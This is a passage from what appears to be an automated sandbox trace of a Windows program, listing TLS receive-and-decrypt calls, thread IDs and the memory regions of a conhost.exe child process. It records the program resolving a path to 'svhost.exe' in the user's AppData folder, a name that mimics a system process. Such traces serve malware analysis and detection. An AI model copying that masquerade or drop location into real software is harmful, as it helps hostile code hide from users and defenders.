| out: pMessage=0x2b3ecb8, pfQOP=0x0) returned 0x0 [0282.807] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.807] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.807] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3ee98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3ee98, pfQOP=0x0) returned 0x0 [0282.808] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.808] recv (in: s=0x59c, buf=0x2b13685, len=12688, flags=0 | out: buf=0x2b13685*) returned 12688 [0282.808] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3f078, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3f078, pfQOP=0x0) returned 0x0 [0282.809] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.809] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.809] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3f258, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3f258, pfQOP=0x0) returned 0x0 [0282.810] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.810] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.810] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3f438, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3f438, pfQOP=0x0) returned 0x0 [0282.810] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.871] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.871] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3f618, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3f618, pfQOP=0x0) returned 0x0 [0282.872] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.872] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.872] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3f7f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3f7f8, pfQOP=0x0) returned 0x0 [0282.872] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.872] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.872] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3f9d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3f9d8, pfQOP=0x0) returned 0x0 [0282.872] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.872] recv (in: s=0x59c, buf=0x2b13685, len=16032, flags=0 | out: buf=0x2b13685*) returned 16032 [0282.872] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3fbb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3fbb8, pfQOP=0x0) returned 0x0 [0282.873] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.873] recv (in: s=0x59c, buf=0x2b13685, len=400, flags=0 | out: buf=0x2b13685*) returned 400 [0282.873] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3fd98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3fd98, pfQOP=0x0) returned 0x0 [0282.873] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.876] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.877] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b3ff78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b3ff78, pfQOP=0x0) returned 0x0 [0282.879] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.880] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.880] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b40180, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b40180, pfQOP=0x0) returned 0x0 [0282.880] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.880] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.880] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b40360, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b40360, pfQOP=0x0) returned 0x0 [0282.881] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.881] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.881] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b40540, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b40540, pfQOP=0x0) returned 0x0 [0282.881] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.903] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 13795 [0282.903] recv (in: s=0x59c, buf=0x2b16c68, len=2613, flags=0 | out: buf=0x2b16c68*) returned 2613 [0282.904] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b40720, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b40720, pfQOP=0x0) returned 0x0 [0282.904] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.904] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.905] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b40900, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b40900, pfQOP=0x0) returned 0x0 [0282.905] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.905] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.905] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b40ae0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b40ae0, pfQOP=0x0) returned 0x0 [0282.906] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.906] recv (in: s=0x59c, buf=0x2b13685, len=16032, flags=0 | out: buf=0x2b13685*) returned 16032 [0282.906] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b40cc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b40cc0, pfQOP=0x0) returned 0x0 [0282.906] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.949] recv (in: s=0x59c, buf=0x2b13685, len=4120, flags=0 | out: buf=0x2b13685*) returned 4120 [0282.950] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b40ea0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b40ea0, pfQOP=0x0) returned 0x0 [0282.950] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.950] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.950] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b41080, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b41080, pfQOP=0x0) returned 0x0 [0282.951] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.951] recv (in: s=0x59c, buf=0x2b13685, len=12688, flags=0 | out: buf=0x2b13685*) returned 12688 [0282.951] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b41260, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b41260, pfQOP=0x0) returned 0x0 [0282.951] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.952] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.952] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b41440, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b41440, pfQOP=0x0) returned 0x0 [0282.952] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.952] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.952] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b41620, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b41620, pfQOP=0x0) returned 0x0 [0282.952] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.986] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.986] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b41800, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b41800, pfQOP=0x0) returned 0x0 [0282.987] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.987] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.988] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b419e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b419e0, pfQOP=0x0) returned 0x0 [0282.988] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.988] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.988] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b41bc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b41bc0, pfQOP=0x0) returned 0x0 [0282.988] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0282.988] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0282.988] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b41da0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b41da0, pfQOP=0x0) returned 0x0 [0282.989] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.049] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 11035 [0283.050] recv (in: s=0x59c, buf=0x2b161a0, len=5373, flags=0 | out: buf=0x2b161a0*) returned 5373 [0283.052] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b41f80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b41f80, pfQOP=0x0) returned 0x0 [0283.053] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.053] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0283.053] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b42160, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b42160, pfQOP=0x0) returned 0x0 [0283.053] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.053] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0283.054] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b42340, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b42340, pfQOP=0x0) returned 0x0 [0283.054] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.054] recv (in: s=0x59c, buf=0x2b13685, len=16032, flags=0 | out: buf=0x2b13685*) returned 16032 [0283.054] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b42520, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b42520, pfQOP=0x0) returned 0x0 [0283.054] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.082] recv (in: s=0x59c, buf=0x2b13685, len=4120, flags=0 | out: buf=0x2b13685*) returned 4120 [0283.082] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b42700, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b42700, pfQOP=0x0) returned 0x0 [0283.083] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.083] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0283.083] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b428e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b428e0, pfQOP=0x0) returned 0x0 [0283.084] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.084] recv (in: s=0x59c, buf=0x2b13685, len=12688, flags=0 | out: buf=0x2b13685*) returned 12688 [0283.084] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b42ac0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b42ac0, pfQOP=0x0) returned 0x0 [0283.084] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.085] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0283.085] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b42ca0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b42ca0, pfQOP=0x0) returned 0x0 [0283.085] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.085] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0283.085] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b42e80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b42e80, pfQOP=0x0) returned 0x0 [0283.085] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.144] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0283.145] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b43060, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b43060, pfQOP=0x0) returned 0x0 [0283.146] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.146] recv (in: s=0x59c, buf=0x2b13685, len=16408, flags=0 | out: buf=0x2b13685*) returned 16408 [0283.146] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b43240, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b43240, pfQOP=0x0) returned 0x0 [0283.146] recv (in: s=0x59c, buf=0x2b13680, len=5, flags=0 | out: buf=0x2b13680*) returned 5 [0283.146] recv (in: s=0x59c, buf=0x2b13685, len=11798, flags=0 | out: buf=0x2b13685*) returned 11798 [0283.146] DecryptMessage (in: phContext=0x2afadc0, pMessage=0x2b43420, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2b43420, pfQOP=0x0) returned 0x0 [0283.147] SetEvent (hEvent=0x32c) returned 1 [0283.782] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x7f9da0 | out: pfEnabled=0x7f9da0) returned 0x0 [0284.554] CoTaskMemAlloc (cb=0x20c) returned 0xa1ca40 [0284.554] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xa1ca40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0284.594] CoTaskMemFree (pv=0xa1ca40) [0284.594] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x7fabe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0284.596] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\svhost.exe", nBufferLength=0x105, lpBuffer=0x7fad90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\svhost.exe", lpFilePart=0x0) returned 0x2e Thread: id = 157 os_tid = 0xe88 Thread: id = 159 os_tid = 0xd50 Thread: id = 160 os_tid = 0xd5c [0143.445] CoGetContextToken (in: pToken=0x1b31fa80 | out: pToken=0x1b31fa80) returned 0x800401f0 [0143.445] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0143.445] RoInitialize () returned 0x1 [0143.445] RoUninitialize () returned 0x0 [0283.272] CertFreeCertificateContext (pCertContext=0xa00a20) returned 1 [0283.288] CloseHandle (hObject=0x55c) returned 1 [0283.288] CloseHandle (hObject=0x558) returned 1 [0283.288] CertFreeCertificateContext (pCertContext=0xa00920) returned 1 [0283.288] CloseHandle (hObject=0x53c) returned 1 [0283.288] CloseHandle (hObject=0x530) returned 1 [0283.288] CertFreeCertificateContext (pCertContext=0xa02420) returned 1 [0283.291] CloseHandle (hObject=0x344) returned 1 [0283.291] CloseHandle (hObject=0x430) returned 1 [0283.291] CertFreeCertificateContext (pCertContext=0xa012a0) returned 1 [0283.291] CloseHandle (hObject=0x348) returned 1 [0283.291] CloseHandle (hObject=0x438) returned 1 [0283.291] CloseHandle (hObject=0x330) returned 1 [0283.292] CloseHandle (hObject=0x380) returned 1 [0283.292] CertFreeCertificateContext (pCertContext=0xa01f20) returned 1 [0283.292] CloseHandle (hObject=0x398) returned 1 [0283.292] CertFreeCertificateContext (pCertContext=0xa018a0) returned 1 [0283.292] CloseHandle (hObject=0x2d8) returned 1 [0283.293] CloseHandle (hObject=0x2d0) returned 1 [0283.293] CloseHandle (hObject=0x3cc) returned 1 [0283.293] CertFreeCertificateContext (pCertContext=0xa00a20) returned 1 [0283.293] CloseHandle (hObject=0x328) returned 1 [0283.293] CloseHandle (hObject=0x33c) returned 1 [0283.293] CloseHandle (hObject=0x39c) returned 1 [0283.293] CloseHandle (hObject=0x5dc) returned 1 [0283.294] CloseHandle (hObject=0x334) returned 1 [0283.294] CertCloseStore (hCertStore=0x9fe680, dwFlags=0x0) returned 1 [0283.294] CloseHandle (hObject=0x420) returned 1 [0283.295] CloseHandle (hObject=0x340) returned 1 [0283.295] CloseHandle (hObject=0x448) returned 1 [0283.295] CloseHandle (hObject=0x444) returned 1 Thread: id = 164 os_tid = 0x7a0 Thread: id = 165 os_tid = 0xfd4 Thread: id = 166 os_tid = 0x1344 Thread: id = 167 os_tid = 0x978 Thread: id = 168 os_tid = 0xdd4 Thread: id = 169 os_tid = 0x8b4 Thread: id = 225 os_tid = 0xb2c Thread: id = 252 os_tid = 0x10ac Thread: id = 276 os_tid = 0x1270 Thread: id = 277 os_tid = 0x1274 Thread: id = 278 os_tid = 0x1278 [0281.318] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0281.319] RoInitialize () returned 0x1 [0281.319] RoUninitialize () returned 0x0 [0281.321] ResetEvent (hEvent=0x32c) returned 1 Thread: id = 279 os_tid = 0x127c Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x36b09000" os_pid = "0x778" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x6d8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2292 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2293 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2294 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2295 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2296 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2297 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2298 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2299 start_va = 0x7ff7a29a0000 end_va = 0x7ff7a29b0fff monitored = 0 entry_point = 0x7ff7a29a16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2300 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2301 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2302 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2303 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2304 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2305 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2306 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2311 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2312 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2313 start_va = 0x400000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2314 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2315 start_va = 0x7ffb1cba0000 end_va = 0x7ffb1cbf8fff monitored = 0 entry_point = 0x7ffb1cbafbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2320 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2321 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2322 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2323 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2324 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2325 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2326 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2327 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2328 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2329 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2330 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2331 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2336 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2337 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2338 start_va = 0x6f0000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2339 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 2340 start_va = 0xa10000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 2341 start_va = 0x4b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2342 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2343 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2344 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2345 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: 